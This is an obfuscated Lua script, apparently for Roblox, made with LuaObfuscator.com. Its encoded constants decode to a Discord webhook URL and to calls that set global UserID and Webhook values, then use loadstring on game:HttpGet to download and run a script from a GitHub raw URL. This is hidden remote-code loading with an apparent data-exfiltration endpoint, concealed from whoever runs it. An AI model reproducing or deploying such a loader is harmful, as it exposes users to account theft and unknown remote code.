--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v68=v2(v0(v20,16));if v19 then local v80=0;local v81;while true do if (v80==0) then v81=v5(v68,v19);v19=nil;v80=1;end if (v80==1) then return v81;end end else return v68;end end end);local function v21(v22,v23,v24)if v24 then local v69=(v22/((1605 -(966 + 637))^(v23-(1 + 0))))%((2 + 0)^(((v24-(3 -2)) -(v23-(1 + 0 + 0))) + (1 -0))) ;return v69-(v69%(2 -1)) ;else local v70=2^(v23-(1614 -(596 + 1017))) ;return (((v22%(v70 + v70))>=v70) and (2 -1)) or ((241 -(31 + 210)) + 0) ;end end local function v25()local v38=0;local v39;while true do if (v38==0) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=1 -0 ;end if (v38==(2 -1)) then return v39;end end end local function v26()local v40,v41=v1(v16,v18,v18 + (1717 -(861 + 854)) );v18=v18 + 2 ;return (v41 * (107 + 149)) + v40 ;end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + (8 -5) );v18=v18 + (1280 -(1010 + 266)) ;return (v45 * 16777216) + (v44 * (61477 + 4059)) + (v43 * (194 + (1638 -(869 + 707)))) + v42 ;end local function v28()local v46=v27();local v47=v27();local v48=1 -0 ;local v49=(v21(v47,2 -(1 + 0) ,18 + 2 ) * ((5 -(7 -4))^32)) + v46 ;local v50=v21(v47,41 -20 ,(1775 -(527 + 1224)) + 7 );local v51=((v21(v47,(1688 -(178 + 1484)) + 6 )==(1 + 0)) and  -(1 + (232 -(191 + 41)))) or 1 ;if (v50==(0 -0)) then if (v49==(714 -(252 + 462))) then return v51 * (1409 -(11 + (2996 -(1245 + 353)))) ;else v50=(1889 -(1551 + 337)) + 0 ;v48=920 -(877 + 43) ;end elseif (v50==(3360 -(1779 -(25 + 441)))) then return ((v49==(1307 -(178 + 1129))) and (v51 * ((1 -0)/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-(2841 -(1429 + 389)) ) * (v48 + (v49/((1 + 1)^52))) ;end local function v29(v30)local v52;if  not v30 then local v71=0 -0 ;while true do if (v71==(0 -0)) then v30=v27();if (v30==(0 -0)) then return "";end break;end end end v52=v3(v16,v18,(v18 + v30) -((3 + 0) -2) );v18=v18 + v30 ;local v53={};for v66=1 + 0 , #v52 do v53[v66]=v2(v1(v3(v52,v66,v66)));end return v6(v53);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v54=0 + 0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==(10 -7)) then v61=nil;while true do local v82=0 -0 ;local v83;local v84;while true do if (v82==(1045 -(584 + 461))) then v83=0 -0 ;v84=nil;v82=1426 -(15 + 1410) ;end if (v82==1) then while true do if (v83==(0 -0)) then v84=0 -0 ;while true do if (v84==(100 -(75 + 25))) then local v111=0;while true do if ((152 -(77 + 74))~=v111) then else v84=1;break;end if (v111~=0) then else if (v55==(1 + 1)) then local v115=0 -0 ;local v116;local v117;while true do if (v115==(0 -0)) then v116=0 + 0 ;v117=nil;v115=429 -(283 + 145) ;end if (v115~=(2 -1)) then else while true do if (v116==(0 + 0)) then v117=0 + 0 ;while true do if (v117~=1) then else for v159=1 + 0 ,v27() do local v160=0;local v161;while true do if (v160==0) then v161=v25();if (v21(v161,291 -(106 + 184) ,1)~=(0 -0)) then else local v163=0 -0 ;local v164;local v165;local v166;local v167;local v168;while true do if (v163~=2) then else v168=nil;while true do if (1~=v164) then else local v183=115 -(111 + 4) ;while true do if (v183==(1359 -(436 + 923))) then v167=nil;v168=nil;v183=1;end if (v183==(1153 -(1078 + 74))) then v164=2 + 0 ;break;end end end if (v164~=(2 -0)) then else while true do if (v165~=(0 -0)) then else local v186=0;local v187;while true do if (v186==0) then v187=0 + 0 ;while true do if (v187~=1) then else v165=1 -0 ;break;end if ((0 + 0)~=v187) then else local v198=0 -0 ;while true do if ((0 + 0)==v198) then local v201=1467 -(1356 + 111) ;while true do if (v201==(1679 -(429 + 1250))) then v166=v21(v161,1 + 1 ,728 -(715 + 10) );v167=v21(v161,1873 -(800 + 1069) ,6);v201=1258 -(171 + 1086) ;end if (v201==(55 -(47 + 7))) then v198=2 -1 ;break;end end end if (v198==(1 + 0)) then v187=1 + 0 ;break;end end end end break;end end end if (v165~=(1551 -(801 + 747))) then else if (v21(v167,3,3)==1) then v168[1 + 3 ]=v61[v168[1 + 3 ]];end v56[v159]=v168;break;end if (v165~=(3 -2)) then else local v189=0 -0 ;local v190;local v191;while true do if (v189~=(0 + 0)) then else v190=0 -0 ;v191=nil;v189=1;end if (v189==(1 -0)) then while true do if ((0 + 0)==v190) then v191=782 -(597 + 185) ;while true do if (v191==(0 + 0)) then local v202=0 + 0 ;local v203;while true do if (v202~=(0 + 0)) then else v203=0;while true do if ((1392 -(885 + 507))~=v203) then else local v205=0 -0 ;while true do if (v205~=(544 -(312 + 231))) then else v203=3 -2 ;break;end if (0~=v205) then else v168={v26(),v26(),nil,nil};if (v166==0) then local v210=0;local v211;while true do if (v210==(1198 -(293 + 905))) then v211=1120 -(677 + 443) ;while true do if (v211~=(1536 -(921 + 615))) then else v168[2 + 1 ]=v26();v168[4]=v26();break;end end break;end end elseif (v166==1) then v168[2 + 1 ]=v27();elseif (v166==(2 + 0)) then v168[3]=v27() -((1381 -(124 + 1255))^(16 + 0)) ;elseif (v166==(4 -1)) then local v216=0;while true do if (v216==(0 + 0)) then v168[8 -5 ]=v27() -((2 + 0)^16) ;v168[13 -9 ]=v26();break;end end end v205=1 + 0 ;end end end if (v203==1) then v191=2 -1 ;break;end end break;end end end if (v191==1) then v165=2;break;end end break;end end break;end end end if ((2 + 0)~=v165) then else local v192=1921 -(1198 + 723) ;local v193;while true do if (v192==(709 -(306 + 403))) then v193=0 -0 ;while true do if (v193==(569 -(496 + 73))) then local v199=0;local v200;while true do if (v199~=(0 -0)) then else v200=0;while true do if (v200==0) then local v204=616 -(466 + 150) ;while true do if (v204==(1 + 0)) then v200=2 -1 ;break;end if ((0 -0)==v204) then if (v21(v167,1 + 0 ,198 -(143 + 54) )==(3 -2)) then v168[1125 -(112 + 1011) ]=v61[v168[2]];end if (v21(v167,860 -(7 + 851) ,2)==1) then v168[1 + 2 ]=v61[v168[1065 -(954 + 108) ]];end v204=1983 -(286 + 1696) ;end end end if ((1977 -(395 + 1581))==v200) then v193=1 + 0 ;break;end end break;end end end if (v193==(69 -(28 + 40))) then v165=2 + 1 ;break;end end break;end end end end break;end if ((0 + 0)==v164) then local v184=0 -0 ;while true do if (v184==(1566 -(587 + 978))) then v164=1 -0 ;break;end if (v184==0) then v165=0;v166=nil;v184=4 -3 ;end end end end break;end if (v163==(3 -2)) then v166=nil;v167=nil;v163=2 -0 ;end if (v163==0) then v164=346 -(333 + 13) ;v165=nil;v163=1 + 0 ;end end end break;end end end v55=2 + 1 ;break;end if (v117==(0 -0)) then local v152=0 + 0 ;local v153;while true do if (v152==(0 -0)) then v153=0;while true do if (v153~=(564 -(544 + 19))) then else v117=664 -(608 + 55) ;break;end if (v153==(0 -0)) then for v171=1 + 0 ,v60 do local v172=0 -0 ;local v173;local v174;local v175;local v176;while true do if (v172~=2) then else while true do if (v173~=1) then else v176=nil;while true do if (1==v174) then if (v175==(1 -0)) then v176=v25()~=(0 + 0) ;elseif (v175==(1 + 1)) then v176=v28();elseif (v175==(1292 -(1239 + 50))) then v176=v29();end v61[v171]=v176;break;end if (v174==0) then local v195=485 -(121 + 364) ;while true do if (v195==(981 -(637 + 344))) then v175=v25();v176=nil;v195=2 -1 ;end if (v195==(1 + 0)) then v174=1;break;end end end end break;end if (v173~=(0 + 0)) then else local v185=1344 -(392 + 952) ;while true do if (v185==(1 + 0)) then v173=1265 -(1220 + 44) ;break;end if (v185~=(0 + 0)) then else v174=1041 -(49 + 992) ;v175=nil;v185=1;end end end end break;end if (v172==0) then v173=0 + 0 ;v174=nil;v172=1;end if (v172==1) then v175=nil;v176=nil;v172=2 + 0 ;end end end v59[3]=v25();v153=1 + 0 ;end end break;end end end end break;end end break;end end end if (v55==1) then local v118=0 + 0 ;local v119;while true do if (v118~=(0 + 0)) then else v119=899 -(732 + 167) ;while true do if (0==v119) then local v144=0 -0 ;while true do if (v144==(0 -0)) then v59={v56,v57,nil,v58};v60=v27();v144=960 -(724 + 235) ;end if (v144==1) then v119=2 -1 ;break;end end end if (v119~=1) then else v61={};v55=170 -(59 + 109) ;break;end end break;end end end v111=1525 -(1140 + 384) ;end end end if (v84~=(3 -2)) then else if ((0 + 0)~=v55) then else local v112=684 -(499 + 185) ;while true do if (v112~=(0 -0)) then else local v120=0 + 0 ;while true do if (v120==(244 -(162 + 81))) then v112=2 -1 ;break;end if (v120~=(229 -(174 + 55))) then else v56={};v57={};v120=1;end end end if (v112==(3 -2)) then v58={};v55=1 -0 ;break;end end end if ((3 + 0)==v55) then local v113=0 + 0 ;local v114;while true do if (v113==(0 -0)) then v114=0 + 0 ;while true do local v140=1575 -(1259 + 316) ;while true do if (v140==(0 -0)) then if (v114~=(0 + 0)) then else local v145=0;local v146;while true do if (v145==(1444 -(31 + 1413))) then v146=0;while true do if ((521 -(126 + 394))==v146) then v114=1 + 0 ;break;end if (v146==(1430 -(917 + 513))) then local v162=1844 -(775 + 1069) ;while true do if (v162==1) then v146=585 -(454 + 130) ;break;end if ((0 + 0)==v162) then for v177=1 + 0 ,v27() do v57[v177-(1 + 0) ]=v33();end for v179=1,v27() do v58[v179]=v27();end v162=1;end end end end break;end end end if (v114==(1 -0)) then return v59;end break;end end end break;end end end break;end end break;end end break;end end end break;end if (v54==1) then local v72=0 -0 ;local v73;while true do if ((924 -(753 + 171))~=v72) then else v73=0 -0 ;while true do if (v73==0) then local v101=0 + 0 ;while true do if (1==v101) then v73=1 + 0 ;break;end if (v101~=0) then else v57=nil;v58=nil;v101=1;end end end if (v73==(1 + 0)) then v54=2;break;end end break;end end end if (v54~=2) then else local v74=1789 -(1620 + 169) ;local v75;while true do if (v74==0) then v75=155 -(150 + 5) ;while true do if (v75~=1) then else v54=2 + 1 ;break;end if (v75==0) then v59=nil;v60=nil;v75=1 + 0 ;end end break;end end end if (0==v54) then local v76=138 -(40 + 98) ;while true do if (v76~=(1 -0)) then else v54=3 -2 ;break;end if (v76~=(1714 -(1651 + 63))) then else v55=0 -0 ;v56=nil;v76=1293 -(1173 + 119) ;end end end end end local function v34(v35,v36,v37)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v35[1];v64=v35[2];v62=1;end if (v62==1) then v65=v35[3];return function(...)local v85=0;local v86;local v87;local v88;local v89;local v90;while true do if (v85==1) then v88={...};v89=v12("#",...) -1 ;v85=2;end if (v85==3) then A,B=v32(v11(v90));if  not A[1] then local v102=v35[4][v86] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v85==2) then v90=nil;v90=function()local v91=v63;local v92=v64;local v93=v65;local v94=v32;local v95={};local v96={};local v97={};for v103=0 + 0 ,v89 do if ((v103>=v93) or ((960 + 669)>=(7183 -4017))) then v95[v103-v93 ]=v88[v103 + (3 -2) ];else v97[v103]=v88[v103 + 1 + 0 ];end end local v98=(v89-v93) + 1 + 0 ;local v99;local v100;while true do local v104=1537 -(1510 + 27) ;while true do if (((5460 -(505 + 99))>=(86 + 1941)) and (v104==(2 -1))) then if (((625 -(158 + 23))<=(11400 -7382)) and (v100<=(747 -(420 + 324)))) then if ((v100<=(2 -1)) or ((2276 -987)==(1012 -573))) then if (((5227 -(30 + 945))==(183 + 4069)) and (v100==0)) then v97[v99[5 -3 ]]=v99[2 + 1 ];else v97[v99[(1508 -(1167 + 340)) + 1 ]]();end elseif ((v100>(2 + 0 + (0 -0))) or ((4176 -(374 + 696))>(5508 -(37 + 524)))) then v97[v99[1 + 1 ]][v99[(817 -(681 + 127)) -6 ]]=v99[933 -(97 + 832) ];else v97[v99[1 + (257 -(102 + 154)) ]]=v37[v99[6 -3 ]];end elseif ((v100<=(1839 -(1664 + 170))) or ((4969 -(228 + 885))<=(989 + 1566))) then if ((v100==((5 -3) + 2)) or ((438 + 2459)>(889 + 2577))) then local v127=(0 + 0) -0 ;local v128;local v129;local v130;local v131;while true do if ((v127==(1 + 0)) or ((2530 -(92 + 15 + 1))<=(3317 -2148))) then v87=(v130 + v128) -(1 -0) ;v131=0 + 0 ;v127=9 -7 ;end if ((((1101 + 3765) -(258 + 1168))>(1778 -(912 + (1614 -(1010 + 396))))) and (v127==(0 -0))) then local v141=(6188 -4207) -(162 + 1819) ;while true do if ((v141==(1713 -(1226 + 487))) or ((3981 -(242 + 160 + 14))<(3765 -(74 + 314)))) then v128=v99[2 -0 ];v129,v130=v94(v97[v128](v13(v97,v128 + (222 -(52 + 169)) ,v99[8 -5 ])));v141=4 -3 ;end if ((v141==(1 -0)) or ((5996 -((1293 -(5 + 562)) + 937))<(839 -(82 + 528)))) then v127=833 -((604 -253) + 481) ;break;end end end if ((((4862 -(670 + 792)) + 801)==(14684 -10483)) and (v127==(5 -3))) then for v142=v128,v87 do local v143=0 + 0 ;while true do if ((v143==(0 + (613 -(436 + 177)))) or ((4379 -2524)==(2616 + 2015))) then v131=v131 + (1 -0) ;v97[v142]=v129[v131];break;end end end break;end end else local v132=0 -0 ;local v133;local v134;local v135;local v136;while true do if ((2==v132) or (((5589 -4323) -(424 + 512))>=(1150 + 223))) then while true do if (((2037 + 2185)<(1749 + 3077)) and (v133==((43 + 1779) -(619 + (2321 -1118))))) then v134=0 + 0 ;v135=nil;v133=2 -1 ;end if (((1638 -(226 + 54 + 84))<=(4225 -(441 + 476))) and (v133==((2474 -(412 + 856)) -(294 + 911)))) then v136=nil;while true do if ((v134==(1 + 0)) or ((1593 + 667 + 410)>=(4138 -(479 + 123)))) then v97[v135 + (1605 -(153 + 1451)) ]=v136;v97[v135]=v136[v99[(1184 -(391 + 790)) + 1 ]];break;end if (((3270 -2574)<=(372 + 48 + 2384)) and (v134==((5271 -3866) -(777 + 628)))) then local v157=0 + 0 ;local v158;while true do if ((v157==(0 -0)) or ((5107 -(709 + 87))==(4102 -(524 + 884)))) then v158=(0 -0) -0 ;while true do if ((((2392 -728) + 2131)<=(636 + 3689)) and (v158==(229 -(3 + 99 + 126)))) then v134=1 + 0 + 0 ;break;end if (((856 -(85 + 771))==v158) or ((1822 + 2931)<=(1191 -(423 + 82)))) then local v170=1479 -(804 + 454 + 221) ;while true do if (((0 + 0)==v170) or (((2172 -(881 + 833)) + 261)>=(1040 + 648 + 469))) then v135=v99[4 -2 ];v136=v97[v99[1850 -((1820 -(292 + 3)) + 322) ]];v170=1 + 0 ;end if ((v170==(1 -0)) or ((12055 -8967)==(1974 -(567 + 81 + 577)))) then v158=1;break;end end end end break;end end end end break;end end break;end if ((v132==(408 -(148 + 260))) or ((1572 -(350 + 378))>=(865 + 3828))) then v133=0 + 0 ;v134=nil;v132=2 -(674 -(512 + 161)) ;end if (((2232 -(52 + 103))>(552 + 943)) and (v132==(1 + 0))) then v135=nil;v136=nil;v132=1668 -(1568 + (153 -55)) ;end end end elseif ((v100>(9 -3)) or (886<=(1967 -(1531 + 131)))) then do return;end else local v137=(0 + 0) -0 ;local v138;local v139;while true do if ((v137==(2 -1)) or ((10186 -6221)<=1338)) then while true do if (((23413 -18652)>(3542 -(2867 -(775 + 362)))) and (v138==((0 -0) -0))) then v139=v99[2 + 0 ];v97[v139]=v97[v139](v13(v97,v139 + (1 -0) ,v87));break;end end break;end if (((5820 -(241 + 764))>(1483 -1020)) and (v137==(0 + 0))) then v138=0 -0 ;v139=nil;v137=(2 + 0) -1 ;end end end v86=v86 + (2 -1) ;break;end if (((21 + 92)<=(849 + 10)) and (v104==(0 -0))) then v99=v91[v86];v100=v99[3 -2 ];v104=1 + 0 ;end end end end;v85=3;end if (v85==0) then v86=1;v87= -1;v85=1;end end end;end end end return v34(v33(),{},v17)(...);end v15("LOL!093O0003023O005F4703063O00557365724944022O0080FDB4F1CE4103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313037393335322O30353635323338313736372F766B785676584C4D442O317046362O6B436D457752547742722D6E6B6C5567364C4D6C6A74476C384954537A2O6762385F7A59396B336B70646B466E4B7969367055454F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F5363726970742E6C7561000C3O0012023O00013O0030033O000200030012023O00013O0030033O000400050012023O00063O001202000100073O00200500010001000800122O000300094O0004000100034O00065O00022O00013O000100012O00073O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
